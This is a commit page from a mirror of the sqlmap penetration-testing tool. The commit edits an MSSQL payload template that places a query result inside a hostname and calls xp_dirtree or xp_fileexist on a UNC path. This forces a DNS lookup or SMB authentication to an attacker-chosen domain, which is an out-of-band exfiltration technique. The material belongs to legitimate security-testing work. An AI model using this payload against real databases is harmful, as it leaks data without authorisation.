sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-03-03 19:55:47 +03:00
Code Issues Packages Projects Releases Wiki Activity

Change MSSQL dns_request.sql to reduce escaping issues

Browse Source 
Modified the xp_dirtree and xp_cmdshell UNC paths to use forward slashes instead of backslashes, and removed the space between the procedure name and quoted path.

These changes help to avoid escaping/encoding issues, for example when using JSON. MSSQL still handles it the same way and will cause a DNS query or SMB authentication attempt.
This commit is contained in:
Jason Juntunen 2025-01-23 21:14:45 -06:00 committed by GitHub
parent 0f9a1c801c
commit 4d259790cd
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
data/procs/mssqlserver/dns_request.sql
View File

@ -1,4 +1,4 @@
DECLARE @host varchar(1024);
SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%';
EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"')
# or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"')
EXEC('master..xp_dirtree"//'+@host+'/%RANDSTR1%"')
# or EXEC('master..xp_fileexist"//'+@host+'/%RANDSTR1%"')